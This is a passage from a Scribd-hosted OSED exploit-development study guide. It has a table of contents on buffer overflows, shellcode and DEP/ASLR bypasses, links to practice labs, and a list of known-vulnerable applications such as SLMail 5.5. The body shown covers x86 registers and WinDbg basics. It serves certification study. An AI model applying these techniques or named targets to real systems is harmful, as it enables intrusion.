0% found this document useful (0 votes)

311 views612 pages

OSED Notes Study Overview by Joas Antonio

Uploaded by

pygophers

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

311 views612 pages

OSED Notes Study Overview by Joas Antonio

Uploaded by

pygophers

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 612

OSED Notes Study Overview by Joas Antonio

https://www.linkedin.com/in/joas-antonio-dos-santos
Sumário
OSED Notes by Joas Antonio and Alex ..................................................................................... 1
Laboratory..................................................................................................................................... 3
X86 Architecture ........................................................................................................................... 3
CPU Register ............................................................................................................................... 10
General Purpose Registers .......................................................................................... 15
eax ...................................................................................................................................... 15
ebx ...................................................................................................................................... 15
ecx....................................................................................................................................... 15
edx ...................................................................................................................................... 16
esi........................................................................................................................................ 16
edi ....................................................................................................................................... 16
ebp ...................................................................................................................................... 16
esp ...................................................................................................................................... 16
Special Purpose Registers ............................................................................................ 16
eip ....................................................................................................................................... 16
flags .................................................................................................................................... 17
Introduction Windows Debugger............................................................................................... 17
Windows Register ....................................................................................................................... 32
Controlling Execution with Windbg ........................................................................................... 38
Stack Based Buffer Overflow...................................................................................................... 40
Data Execution Prevention................................................................................................... 112
Address Space Layout Randomization ................................................................................. 113
Control Flow Guard .............................................................................................................. 115
Stack Buffer Overflow - Jumping Shellcode ............................................................................. 120
SEH Buffer Overflow ................................................................................................................. 160
Finding Bad Characters ......................................................................................................... 205
IDA Pro ...................................................................................................................................... 238
Windows ASLR Bypass .............................................................................................................. 256
Egg Hunters ............................................................................................................................... 265
Introduction to the Win32 Egghunter.................................................................................. 290
SEH Buffer Overflow EggHunter ........................................................................................... 308
Shellcode ................................................................................................................................... 335
Shellcode Encode and Decode ............................................................................................. 406
Creating Shellcode Encoded ................................................................................................. 418
DEP Bypass ................................................................................................................................ 429
Overwriting EIP ......................................................................................................................... 457
ASLR Bypass .............................................................................................................................. 496
Return Oriented Programming ................................................................................................ 499
Rop Chain .............................................................................................................................. 505
Rop Decode ........................................................................................................................... 591
Reversing Engineering .............................................................................................................. 591
Reverse Engineering with Immunity Debugger ................................................................... 596
Reverse Engineering with GDB............................................................................................. 597
Assembly and C/C++ Courses ................................................................................................... 608
Study Material – OSED ............................................................................................................. 609

Laboratory
https://github.com/CyberSecurityUP/Buffer-Overflow-Labs

https://github.com/firmianay/Life-long-Learner/blob/master/SEED-labs/buffer-overflow-
vulnerability-lab.md

https://github.com/Jeffery-Liu/Buffer-Overflow-Vulnerability-Lab

https://github.com/tecnico-sec/Buffer-Overflow

https://github.com/epi052/osed-scripts

Advantech WebAccess webvrpcs.exe

Sync Breeze Enterprise 10.0.28

Intelligent Management Center (iMC)

SLMail 5.5

X86 Architecture
What Does x86 Architecture Mean?

The x86 architecture is an instruction set architecture (ISA) series for computer processors.
Developed by Intel Corporation, x86 architecture defines how a processor handles and
executes different instructions passed from the operating system (OS) and software programs.
The “x” in x86 denotes ISA version.

Techopedia Explains x86 Architecture

Designed in 1978, x86 architecture was one of the first ISAs for microprocessor-based
computing. Key features include:

Provides a logical framework for executing instructions through a processor

Allows software programs and instructions to run on any processor in the Intel 8086 family

Provides procedures for utilizing and managing the hardware components of a central
processing unit (CPU)

The x86 architecture primarily handles programmatic functions and provides services, such as
memory addressing, software and hardware interrupt handling, data type, registers and
input/output (I/O) management.

Classified by bit amount, the x86 architecture is implemented in multiple microprocessors,

including 8086, 80286, 80386, Core 2, Atom and the Pentium series. Additionally, other
microprocessor manufacturers, like AMD and VIA Technologies, have adopted the x86
architecture.

https://www.techopedia.com/definition/5334/x86-architecture

The Intel x86 processor uses complex instruction set computer (CISC) architecture, which
means there is a modest number of special-purpose registers instead of large quantities of
general-purpose registers. It also means that complex special-purpose instructions will
predominate.

The x86 processor traces its heritage at least as far back as the 8-bit Intel 8080 processor.
Many peculiarities in the x86 instruction set are due to the backward compatibility with that
processor (and with its Zilog Z-80 variant).

Microsoft Win32 uses the x86 processor in 32-bit flat mode. This documentation will focus only
on the flat mode.

Registers

The x86 architecture consists of the following unprivileged integer registers.

eax Accumulator

ebx Base register

ecx Counter register

edx Data register - can be used for I/O port access and arithmetic functions

esi Source index register

edi Destination index register

ebp Base pointer register

esp Stack pointer

All integer registers are 32 bit. However, many of them have 16-bit or 8-bit subregisters.

ax Low 16 bits of eax

bx Low 16 bits of ebx

cx Low 16 bits of ecx

dx Low 16 bits of edx

si Low 16 bits of esi

di Low 16 bits of edi

bp Low 16 bits of ebp

sp Low 16 bits of esp

al Low 8 bits of eax

ah High 8 bits of ax

bl Low 8 bits of ebx

bh High 8 bits of bx

cl Low 8 bits of ecx

ch High 8 bits of cx

dl Low 8 bits of edx

dh High 8 bits of dx

Operating on a subregister affects only the subregister and none of the parts outside the
subregister. For example, storing to the ax register leaves the high 16 bits of the eax register
unchanged.

When using the ? (Evaluate Expression) command, registers should be prefixed with an "at"
sign ( @ ). For example, you should use ? @ax rather than ? ax. This ensures that the debugger
recognizes ax as a register rather than a symbol.

However, the (@) is not required in the r (Registers) command. For instance, r ax=5 will always
be interpreted correctly.

Two other registers are important for the processor's current state.

eip instruction pointer

flags flags

The instruction pointer is the address of the instruction being executed.

The flags register is a collection of single-bit flags. Many instructions alter the flags to describe
the result of the instruction. These flags can then be tested by conditional jump instructions.
See x86 Flags for details.

Calling Conventions

The x86 architecture has several different calling conventions. Fortunately, they all follow the
same register preservation and function return rules:

• Functions must preserve all registers, except for eax, ecx, and edx, which can be
changed across a function call, and esp, which must be updated according to the
calling convention.

• The eax register receives function return values if the result is 32 bits or smaller. If the
result is 64 bits, then the result is stored in the edx:eax pair.

The following is a list of calling conventions used on the x86 architecture:

• Win32 (__stdcall)

Function parameters are passed on the stack, pushed right to left, and the callee cleans the
stack.

• Native C++ method call (also known as thiscall)

Function parameters are passed on the stack, pushed right to left, the "this" pointer is passed
in the ecx register, and the callee cleans the stack.

• COM (__stdcall for C++ method calls)

Function parameters are passed on the stack, pushed right to left, then the "this" pointer is
pushed on the stack, and then the function is called. The callee cleans the stack.

• __fastcall

The first two DWORD-or-smaller arguments are passed in the ecx and edx registers. The
remaining parameters are passed on the stack, pushed right to left. The callee cleans the stack.

• __cdecl

Function parameters are passed on the stack, pushed right to left, and the caller cleans the
stack. The __cdecl calling convention is used for all functions with variable-length parameters.

Debugger Display of Registers and Flags

Here is a sample debugger register display:

dbgcmdCopy

eax=00000000 ebx=008b6f00 ecx=01010101 edx=ffffffff esi=00000000 edi=00465000

eip=77f9d022 esp=05cffc48 ebp=05cffc54 iopl=0 nv up ei ng nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000286

In user-mode debugging, you can ignore the iopl and the entire last line of the debugger
display.
x86 Flags

In the preceding example, the two-letter codes at the end of the second line are flags. These
are single-bit registers and have a variety of uses.

The following table lists the x86 flags:

Flag Flag Name Value Flag Description

Code Status

of Overflow 01 nvov No overflow - Overflow

Flag

df Direction 01 updn Direction up - Direction down

Flag

if Interrupt 01 diei Interrupts disabled - Interrupts enabled

Flag

sf Sign Flag 01 plng Positive (or zero) - Negative

zf Zero Flag 01 nzzr Nonzero - Zero

af Auxiliary 01 naac No auxiliary carry - Auxiliary carry

Carry Flag

pf Parity Flag 0 1 pepo Parity even - Parity odd

cf Carry Flag 01 nccy No carry - Carry

tf Trap Flag If tf equals 1, the processor will raise a STATUS_SINGLE_STEP exception after the
execution of one instruction. This flag is used by a debugger to implement single
tracing. It should not be used by other applications.

iopl I/O Privilege I/O Privilege Level This is a two-bit integer, with values between zero and 3. It is
Level by the operating system to control access to hardware. It should not be used by
applications.

When registers are displayed as a result of some command in the Debugger Command
window, it is the flag status that is displayed. However, if you want to change a flag using the r
(Registers) command, you should refer to it by the flag code.

In the Registers window of WinDbg, the flag code is used to view or alter flags. The flag status
is not supported.

Here is an example. In the preceding register display, the flag status ng appears. This means
that the sign flag is currently set to 1. To change this, use the following command:

dbgcmdCopy

r sf=0

This sets the sign flag to zero. If you do another register display, the ng status code will not
appear. Instead, the pl status code will be displayed.

The Sign Flag, Zero Flag, and Carry Flag are the most commonly-used flags.
Conditions

A condition describes the state of one or more flags. All conditional operations on the x86 are
expressed in terms of conditions.

The assembler uses a one or two letter abbreviation to represent a condition. A condition can
be represented by multiple abbreviations. For example, AE ("above or equal") is the same
condition as NB ("not below"). The following table lists some common conditions and their
meaning.

Condition Flags Meaning

Name

Z ZF=1 Result of last operation was zero.

NZ ZF=0 Result of last operation was not zero.

C CF=1 Last operation required a carry or borrow. (For unsigned integers, this indicates overflow.)

NC CF=0 Last operation did not require a carry or borrow. (For unsigned integers, this indicates overfl

S SF=1 Result of last operation has its high bit set.

NS SF=0 Result of last operation has its high bit clear.

O OF=1 When treated as a signed integer operation, the last operation caused an overflow or under

NO OF=0 When treated as signed integer operation, the last operation did not cause an overflow or
underflow.

Conditions can also be used to compare two values. The cmp instruction compares its two
operands, and then sets flags as if subtracted one operand from the other. The following
conditions can be used to check the result of cmp value1, value2.

Condition Name Flags Meaning after a CMP operation.

E ZF=1 value1 == value2.

NE ZF=0 value1 != value2.

GE NL SF=OF value1 >= value2. Values are treated as signed integers.

LE NG ZF=1 or SF!=OF value1 <= value2. Values are treated as signed integers.

G NLE ZF=0 and SF=OF value1 > value2. Values are treated as signed integers.

L NGE SF!=OF value1 < value2. Values are treated as signed integers.

AE NB CF=0 value1 >= value2. Values are treated as unsigned integers.

BE NA CF=1 or ZF=1 value1 <= value2. Values are treated as unsigned integers.

A NBE CF=0 and ZF=0 value1 > value2. Values are treated as unsigned integers.

B NAE CF=1 value1 < value2. Values are treated as unsigned integers.

Conditions are typically used to act on the result of a cmp or test instruction. For example,
asmCopy

cmp eax, 5

jz equal

compares the eax register against the number 5 by computing the expression (eax - 5) and
setting flags according to the result. If the result of the subtraction is zero, then the zr flag will
be set, and the jz condition will be true so the jump will be taken.

Data Types

• byte: 8 bits

• word: 16 bits

• dword: 32 bits

• qword: 64 bits (includes floating-point doubles)

• tword: 80 bits (includes floating-point extended doubles)

• oword: 128 bits

Notation

The following table indicates the notation used to describe assembly language instructions.

Notation Meaning

r, r1, r2... Registers

m Memory address (see the succeeding Addressing Modes section for more information.)

#n Immediate constant

r/m Register or memory

r/#n Register or immediate constant

r/m/#n Register, memory, or immediate constant

cc A condition code listed in the preceding Conditions section.

T "B", "W", or "D" (byte, word or dword)

accT Size T accumulator: al if T = "B", ax if T = "W", or eax if T = "D"

Addressing Modes

There are several different addressing modes, but they all take the form T ptr [expr],
where T is some data type (see the preceding Data Types section) and expr is some expression
involving constants and registers.

The notation for most modes can be deduced without much difficulty. For example, BYTE PTR
[esi+edx*8+3] means "take the value of the esi register, add to it eight times the value of
the edx register, add three, then access the byte at the resulting address."

Pipelining
The Pentium is dual-issue, which means that it can perform up to two actions in one clock tick.
However, the rules on when it is capable of doing two actions at once (known as pairing) are
very complicated.

Because x86 is a CISC processor, you do not have to worry about jump delay slots.

Synchronized Memory Access

Load, modify, and store instructions can receive a lock prefix, which modifies the instruction as
follows:

1. Before issuing the instruction, the CPU will flush all pending memory operations to
ensure coherency. All data prefetches are abandoned.

2. While issuing the instruction, the CPU will have exclusive access to the bus. This
ensures the atomicity of the load/modify/store operation.

The xchg instruction automatically obeys the previous rules whenever it exchanges a value
with memory.

All other instructions default to nonlocking.

Jump Prediction

Unconditional jumps are predicted to be taken.

Conditional jumps are predicted to be taken or not taken, depending on whether they were
taken the last time they were executed. The cache for recording jump history is limited in size.

If the CPU does not have a record of whether the conditional jump was taken or not taken the
last time it was executed, it predicts backward conditional jumps as taken and forward
conditional jumps as not taken.

Alignment

The x86 processor will automatically correct unaligned memory access, at a performance
penalty. No exception is raised.

A memory access is considered aligned if the address is an integer multiple of the object size.
For example, all BYTE accesses are aligned (everything is an integer multiple of 1), WORD
accesses to even addresses are aligned, and DWORD addresses must be a multiple of 4 in
order to be aligned.

The lock prefix should not be used for unaligned memory accesses.

https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/x86-architecture

https://opensecuritytraining.info/IntermediateX86.html

https://www.youtube.com/watch?v=OJxHs-DSQkc

CPU Register
In Computer Architecture, the Registers are very fast computer memory which are used to
execute programs and operations efficiently. This does by giving access to commonly used
values, i.e., the values which are in the point of operation/execution at that time. So, for this
purpose, there are several different classes of CPU registers which works in coordination with
the computer memory to run operations efficiently.

The sole purpose of having register is fast retrieval of data for processing by CPU. Though
accessing instructions from RAM is comparatively faster with hard drive, it still isn’t enough for
CPU. For even better processing, there are memories in CPU which can get data from RAM
which are about to be executed beforehand. After registers we have cache memory, which are
faster but less faster than registers.

These are classified as given below.

• Accumulator:
This is the most frequently used register used to store data taken from memory. It is in
different numbers in different microprocessors.

• Memory Address Registers (MAR):

It holds the address of the location to be accessed from memory. MAR and MDR
(Memory Data Register) together facilitate the communication of the CPU and the
main memory.

• Memory Data Registers (MDR):

It contains data to be written into or to be read out from the addressed location.

• General Purpose Registers:

These are numbered as R0, R1, R2….Rn-1, and used to store temporary data during any
ongoing operation. Its content can be accessed by assembly programming. Modern
CPU architectures tends to use more GPR so that register-to-register addressing can be
used more, which is comparatively faster than other addressing modes.
• Program Counter (PC):
Program Counter (PC) is used to keep the track of execution of the program. It
contains the memory address of the next instruction to be fetched. PC points to the
address of the next instruction to be fetched from the main memory when the
previous instruction has been successfully completed. Program Counter (PC) also
functions to count the number of instructions. The incrementation of PC depends on
the type of architecture being used. If we are using 32-bit architecture, the PC gets
incremented by 4 every time to fetch the next instruction.

• Instruction Register (IR):

The IR holds the instruction which is just about to be executed. The instruction from PC
is fetched and stored in IR. As soon as the instruction in placed in IR, the CPU starts
executing the instruction and the PC points to the next instruction to be executed.

• Condition code register ( CCR ) :

Condition code registers contain different flags that indicate the status of any
operation.for instance lets suppose an operation caused creation of a negative result
or zero, then these flags are set high accordingly.and the flags are

1. Carry C: Set to 1 if an add operation produces a carry or a subtract operation produces

a borrow; otherwise cleared to 0.

2. Overflow V: Useful only during operations on signed integers.

3. Zero Z: Set to 1 if the result is 0, otherwise cleared to 0.

4. Negate N: Meaningful only in signed number operations. Set to 1 if a negative result is

produced.

5. Extend X: Functions as a carry for multiple precision arithmetic operations.

These are generally decided by ALU.

So, these are the different registers which are operating for a specific purpose.

https://www.geeksforgeeks.org/different-classes-of-cpu-registers/

Operations of a CPU Register

For CPU processing these register plays a critical role. When we give the input, these are
stored and in register processes and the output is from the register only.

So basically a register will perform the following operations.

• Fetch: To fetch the instructions of the user also the instructions that are present in the
main memory in a sorted way

• Decode: The second operation is to decode the instructions that need to perform.
Thus CPU will be knowing what are the instructions

• Execute: Once the instructions are decoded then execute operation is performed by
the CPU. Once done the result is presented on the user screen

Different types of Memory Register

There are various types of the register that are available and some mostly used CPU register
are below with the description

• Accumulator (AC)

• Flag Register

• Address Register (AR)

• Data Register (DR)

• Program Counter (PC)

• Instruction Register (IR)

• Stack Control Register (SCR)

• Memory Buffer Register (MBR)

• Index register (IR)

These registers are the most important integral part of the computer and each of these are
having a specific purpose. Let us see below

1. Accumulator

Accumulator register is part of ALU which abbreviates to Arithmetic Logical Unit and as the
name suggests is responsible for performing arithmetic operations and also in logical
operations. The Control unit will store the data values which are fetched from the main
memory into the accumulator for the arithmetic or any other logical operations. This register
holds the initial data, intermediate results and asl well as the final result of the instruction. The
final result of the operations which can be arithmetic or logical will be transferred to the main
memory through MBR

2. Flag Register

This register validates or checks upon the various occurrences of a condition in CPU and is
handled by this special register called flag register. The size of this register is one or two bytes
since it will hold only flag information. This register main gets into the picture when a
condition is being operated.

3. Data Register

This register is used to temporarily store the data being transmitted from the other involved
peripheral devices.

4. Address register

This address the register also called memory address register MAR is a memory unit that stores
the address location od data or instructions on the main memory. They contain a portion of
the address which can be used to compute the complete address.

5. Program Counter

This register is also known popularly as an instruction pointer register. This register as the
name suggests will be holding the address of the next instruction that needs to be fetched and
executed or performed. When the instruction is fetched then the value is incremented and
hence will always be holding the address of the next instruction to be run.

6. Instruction Register

Once the instruction is fetched from the main memory it is stored in Instruction Register IR.
The control units take the instructions from here decodes it and executes it by sending the
required signals to the required component.

7. Stack Control Register SCR

As the work stack in the name of this register represents block, here it represents a set of
memory blocks where the data is stored in and as well as fetched. FILO which is First IN and
Last Out will be followed for the storing and retrieval of the data.

8. Memory Buffer Register

This register holds the information or the data which is read from or written in the memory.
The content or the instructions stored in this register will be transferred to Instruction Register
IR whereas the content of the data is transferred to the accumulator or I/O register.

9. Index Register

The index register is an integral part of computer CPU which will help in modifying the address
of the memory operand during the execution of the program. Basically the contents of the
index register are added to the immediate address to get the resultant the effective address of
data or instruction on the memory.

Why we need a CPU register?

For the fast operations of an instruction, the CPU register is highly useful. Without theses CPU
operation is unimaginable. These are the fastest memory when we look at the different
memory and Laos will hold the top position in the memory hierarchy. A register can hold an
instruction, address, or any other sort of data. There are different types of registers available
and we have seen most used in the above part of the article. Thus having register, it makes the
operations of CPU smooth efficient and meaningfull. A register must be large enough
according to ist requirements and specifications.

Advantages and Disadvantages

Below are advantages and disadvantages

Advantages

Below are the advantages:

• These are fastest memory blocks and hence instructions are executed fastly compared
to main memory

• Since each register purpose is different, and instructions will be handled with grace
and smoothness by the CPU with the help of registers

• There are rarely any CPU that will not be having register in the digital world

Disadvantages
Let us take a look at the disadvantages:

• Since the memory size of the register is finite and if the instruction is bigger then cpu
need to use cache or main memory along with register for the operation

https://www.educba.com/what-is-cpu-register/

Some registers are typically volatile across functions, and others remain unchanged. This is a
feature of the compiler's standards and must be looked after in the code, registers are not
preserved automatically (although in some assembly languages they are -- but not in x86).
What that means is, when a function is called, there is no guarantee that volatile registers will
retain their value when the function returns, and it's the function's responsibility to preserve
non-volatile registers.

The conventions used by Microsoft's compiler are:

• Volatile: ecx, edx

• Non-Volatile: ebx, esi, edi, ebp

• Special: eax, esp (discussed later)

General Purpose Registers

This section will look at the 8 general purpose registers on the x86 architecture.

eax
eax is a 32-bit general-purpose register with two common uses: to store the return value of
a function and as a special register for certain calculations. It is technically a volatile
register, since the value isn't preserved. Instead, its value is set to the return value of a
function before a function returns. Other than esp, this is probably the most important
register to remember for this reason. eax is also used specifically in certain calculations,
such as multiplication and division, as a special register. That use will be examined in the
instructions section.
Here is an example of a function returning in C:

return 3; // Return the value 3

Here's the same code in assembly:

mov eax, 3 ; Set eax (the return value) to 3

ret ; Return

ebx
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a
commonly used value (such as 0) throughout a function to speed up calculations.

ecx
ecx is a volatile general-purpose register that is occasionally used as a function parameter
or as a loop counter.
Functions of the "__fastcall" convention pass the first two parameters to a function using
ecx and edx. Additionally, when calling a member function of a class, a pointer to that class
is often passed in ecx no matter what the calling convention is.
Additionally, ecx is often used as a loop counter. for loops generally, although not always,
set the accumulator variable to ecx. rep- instructions also use ecx as a counter,
automatically decrementing it till it reaches 0. This class of function will be discussed in a
later section.

edx
edx is a volatile general-purpose register that is occasionally used as a function parameter.
Like ecx, edx is used for "__fastcall" functions.
Besides fastcall, edx is generally used for storing short-term variables within a function.

esi
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for
"rep-" class instructions, which require a source and a destination for data, esi points to the
"source". esi often stores data that is used throughout a function because it doesn't change.

edi
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to
esi, except that it is generally used as a destination for data.

ebp
ebp is a non-volatile general-purpose register that has two distinct uses depending on
compile settings: it is either the frame pointer or a general purpose register.
If compilation is not optimized, or code is written by hand, ebp keeps track of where the
stack is at the beginning of a function (the stack will be explained in great detail in a later
section). Because the stack changes throughout a function, having ebp set to the original
value allows variables stored on the stack to be referenced easily. This will be explored in
detail when the stack is explained.
If compilation is optimized, ebp is used as a general register for storing any kind of data,
while calculations for the stack pointer are done based on the stack pointer moving (which
gets confusing -- luckily, IDA automatically detects and corrects a moving stack pointer!)

esp
esp is a special register that stores a pointer to the top of the stack (the top is actually at a
lower virtual address than the bottom as the stack grows downwards in memory towards
the heap). Math is rarely done directly on esp, and the value of esp must be the same at
the beginning and the end of each function. esp will be examined in much greater detail in
a later section.

Special Purpose Registers

For special purpose and floating point registers not listed here, have a look at the Wikipedia
Article or other reference sites.

eip
eip, or the instruction pointer, is a special-purpose register which stores a pointer to the
address of the instruction that is currently executing. Making a jump is like adding to or
subtracting from the instruction pointer.
After each instruction, a value equal to the size of the instruction is added to eip, which
means that eip points at the machine code for the next instruction. This simple example
shows the automatic addition to eip at every step:

eip+1 53 push ebx

eip+4 8B 54 24 08 mov edx, [esp+arg_0]
eip+2 31 DB xor ebx, ebx
eip+2 89 D3 mov ebx, edx
eip+3 8D 42 07 lea eax, [edx+7]
.....

flags
In the flags register, each bit has a specific meaning and they are used to store meta-
information about the results of previous operations. For example, whether the last
calculation overflowed the register or whether the operands were equal. Our interest in the
flags register is usually around the cmp and test operations which will commonly set or
unset the zero, carry and overflow flags. These flags will then be tested by a conditional
jump which may be controlling program flow or a loop.
https://wiki.skullsecurity.org/index.php/Registers

Introduction Windows Debugger

There are several debugging programs available on Windows. OllyDbg13 and Immunity
Debugger14 are well-known in the reverse engineering and exploit development world for
their user-friendly interface. Immunity Debugger originally began as a fork of OllyDbg but it has
since surpassed OllyDbg’s functionality. Despite the convenience of these programs, we will
use Microsoft WinDbg15 debugger exclusively in this course. This is because WinDbg provides
the same scripting features available in Immunity Debugger, along with the availability of both
32- and 64-bit versions. While an open source implementation of OllyDbg for 64-bit exists, it
does not provide the same features or support as WinDbg. WinDbg is also our preferred
debugger because it can debug in both user-mode and kernel-mode, which makes it the best
fit for the development of any kind of exploits leveraged on Windows. WinDbg is provided as
part of the Software Development Kit (SDK), the Windows Driver Kit (WDK), and the Debugging
Tools for Windows, free-of-charge.

What is Time Travel Debugging?

Time Travel Debugging, is a tool that allows you to record an execution of your process
running, then replay it later both forwards and backwards. Time Travel Debugging (TTD) can
help you debug issues easier by letting you "rewind" your debugger session, instead of having
to reproduce the issue until you find the bug.

TTD allows you to go back in time to better understand the conditions that lead up to the bug
and replay it multiple times to learn how best to fix the problem.

TTD can have advantages over crash dump files, which often are missing the code execution
that led up to the ultimate failure.

In the event you can't figure out the issue yourself, you can share the trace with a co-worker
and they can look at exactly what you're looking at. This can allow for easier collaboration than
live debugging, as the recorded instructions are the same, where the address locations and
code execution will be different on different PCs. You can also share a specific point in time to
help your co-worker figure out where to start.

TTD is efficient and works to add as little as possible overhead as it captures code execution in
trace files.

TTD includes a set of debugger data model objects to allow you to query the trace using LINQ.
For example, you can use TTD objects to locate when a specific code module was loaded or
locate all of the exceptions.

Comparison of Debugging Tools

This table summarizes the pros and cons of the different debugging solutions available.

Approach Pros Cons

Live Interactive experience, sees flow Disrupts the user experience, may require effort to
debugging of execution, can change target reproduce the issue repeatedly, may impact security, not
state, familiar tool in familiar always an option on production systems. With repro
setting. difficult to work back from point of failure to determine
cause.

Dumps No coding upfront, low- Successive snapshot or live dumps provide a simple
intrusiveness, based on triggers. “over time” view. Overhead is essentially zero if not
used.

Telemetry & Lightweight, often tied to Issues arise in unexpected code paths (with no
logs business scenarios / user actions, telemetry). Lack of data depth, statically compiled into
machine learning friendly. the code.

Time Travel Great at complex bugs, no coding Large overhead at record time. May collect more data
Debugging upfront, offline repeatable that is needed. Data files can become large.
(TTD)
Approach Pros Cons

debugging, analysis friendly,

captures everything.

TTD Availability

TTD is available on Windows 10 after installing the WinDbg Preview app from the Store.
WinDbg Preview is an improved version of WinDbg with more modern visuals, faster windows,
a full-fledged scripting experience, with built in support for the extensible debugger data
model. For more information on downloading WinDbg Preview from the store, see Debugging
Using WinDbg Preview.

Administrator rights required to use TTD

To use TTD, you need to run the debugger elevated. Install WinDbg Preview using an account
that has administrator privileges and use that account when recording in the debugger. In
order to run the debugger elevated, select and hold (or right-click) the WinDbg Preview icon in
the Start menu and then select More > Run as Administrator.

https://docs.microsoft.com/en-gb/windows-hardware/drivers/debugger/time-travel-
debugging-overview

https://docs.microsoft.com/pt-br/windows-hardware/drivers/debugger/debugger-download-
tools

https://developer.microsoft.com/en-us/windows/hardware/download-windbg

Disassembly Window

The Disassembly window displays executable code in assembly language.

Opening the Disassembly Window

To open or switch to the Disassembly window, in the WinDbg window, on the View menu,

click Disassembly. (You can also press ALT+7 or click the Disassembly (Alt+7) button ( ) on
the toolbar. ALT+SHIFT+7 will close the Disassembly Window.)

The following figure shows an example of a Disassembly window.

The debugger takes a section of memory, interprets it as binary machine instructions, and then
disassembles it to produce an assembly-language version of the machine instructions. The
resulting code is displayed in the Disassembly window.

Using the Disassembly Window

In the Disassembly window, you can do the following:

• To disassemble a different section of memory, in the Offset box, type the address of
the memory you want to disassemble. (You can press ENTER after typing the address,
but you do not have to.) The Disassembly window displays code before you have
completed the address; you can disregard this code.

• To see other sections of memory, click the Previous or Next button or press the
PAGE UP or PAGE DOWN keys. These commands display disassembled code from the
preceding or following sections of memory, respectively. By pressing the RIGHT
ARROW, LEFT ARROR, UP ARROW, and DOWN ARROW keys, you can navigate within
the window. If you use these keys to move off of the page, a new page will appear.

• If you want to disassemble a section of memory that does not contain machine
instructions, the debugger displays error messages.

• The line that represents the current program counter is highlighted in green, unless
you select a line with the mouse or by using one of the Edit | Go to Xxx commands. If
you select a line with the mouse or a Edit | Go to Xxx command, the selected line is
green and the line that represents the current program counter is not highlighted.

• Lines at which breakpoints are set are highlighted. An enabled breakpoint is

highlighted in in red, a disabled breakpoint is highlighted in yellow, and a breakpoint
that coincides with the current program counter is highlighted in purple.

Toolbar and Shortcut Menu

The Disassembly window has a toolbar that contains two buttons and a shortcut menu with
additional commands. To access the menu, right-click the title bar or click the icon that
appears near the upper-right corner of the window ( ). The toolbar and menu contain the
following commands:

• (Toolbar only) The Offset box enables you to specify a new address for disassembly.

• (Toolbar and menu) Previous (on the toolbar) and Previous page (on the shortcut
menu) causes the debugger to disassemble and display the instructions immediately
prior to the current display.

• (Toolbar and menu) Next (on the toolbar) or Next page (on the shortcut menu) causes
the debugger to disassemble and display the instructions immediately after the
current display.

• (Menu only) Go to current address opens the Source window with the source file that
corresponds to the selected line in the Disassembly window and highlights this line.

• (Menu only) Disassemble before current instruction causes the current line to be
placed in the middle of the Disassembly window. This command is the default option.
If this command is cleared the current line will appear at the top of the Disassembly
window, which saves time because reverse-direction disassembly can be time-
consuming.

• (Menu only) Highlight instructions from the current source line causes all of the
instructions that correspond to the current source line to be highlighted. Often, a
single source line will correspond to multiple assembly instructions. If code has been
optimized, these assembly instructions might not be consecutive. This command
enables you to find all of the instructions that were assembled from the current source
line.

• (Menu only) Show source line for each instruction displays the source line number
that corresponds to each assembly instruction.

• (Menu only) Show source file for each instruction displays the source file name that
corresponds to each assembly instruction.

• (Menu only) Toolbar turns the toolbar on and off.

• (Menu only) Dock or Undock causes the window to enter or leave the docked state.

• (Menu only) Move to new dock closes the Disassembly window and opens it in a new
dock.

• (Menu only) Set as tab-dock target for window type is unavailable for the Disassembly
window. This option is only available for Source or Memory windows.

• (Menu only) Always floating causes the window to remain undocked even if it is
dragged to a docking location.

• (Menu only) Move with frame causes the window to move when the WinDbg frame is
moved, even if the window is undocked. For more information about docked, tabbed,
and floating windows, see Positioning the Windows.

• (Menu only) Help opens this topic in the Debugging Tools for Windows
documentation.
• (Menu only) Close closes this window.

http://www.dbgtech.net/windbghelp/hh/debugger/r36_gui_1_f9c06d65-64ae-4439-bb41-
318a12e6c859.xml.htm

Debugger Command Window

You can view memory by entering one of the Display Memory commands in the Debugger
Command window. You can edit memory by entering one of the Enter Values commands in
the Debugger Command window. For more information, see Accessing Memory by Virtual
Address and Accessing Memory by Physical Address.

Opening a Memory Window

To open a Memory window, choose Memory from the View menu. (You can also press ALT+5
or select the Memory button ( ) on the toolbar. ALT+SHIFT+5 closes the active Memory
window.)

The following screen shot shows an example of a Memory window.

Using a Memory Window

The Memory window displays data in several columns. The column on the left side of the
window shows the beginning address of each line. The remaining columns display the
requested information, from left to right. If you select Bytes in the Display format menu, the
ASCII characters that correspond to these bytes are displayed in the right side of the window.

Note By default, the Memory window displays virtual memory. This type of memory is the
only type of memory that is available in user mode. In kernel mode, you can use the Memory
Options dialog box to display physical memory and other data spaces. The Memory
Options dialog box is described later in this topic.
In the Memory window, you can do the following:

• To write to memory, select inside the Memory window and type new data. You can
edit only hexadecimal data—you cannot directly edit ASCII and Unicode characters.
Changes take effect as soon as you type new information.

• To see other sections of memory, use the Previous and Next buttons on the Memory
window toolbar, or press the PAGE UP or PAGE DOWN keys. These buttons and keys
display the immediately preceding or following sections of memory. If you request an
invalid page, an error message appears.

• To navigate within the window, use the RIGHT ARROW, LEFT ARROW, UP ARROW, and
DOWN ARROW keys. If you use these keys to move off of the page, a new page is
displayed. Before you use these keys, you should resize the Memory window so that it
does not have scroll bars. This sizing enables you to distinguish between the actual
page edge and the window cutoff.

• To change the memory location that is being viewed, enter a new address into the
address box at the top of the Memory window. Note that the Memory window
refreshes its display while you enter an address, so you could get error messages
before you have completed typing the address. Note The address that you enter into
the box is interpreted in the current radix. If the current radix is not 16, you should
prefix a hexadecimal address with 0x. To change the default radix, use the n (Set
Number Base) command in the Debugger Command window. The display within the
Memory window itself is not affected by the current radix.

• To change the data type that the window uses to display memory, use the Display
format menu in the Memory window toolbar. Supported data types include short
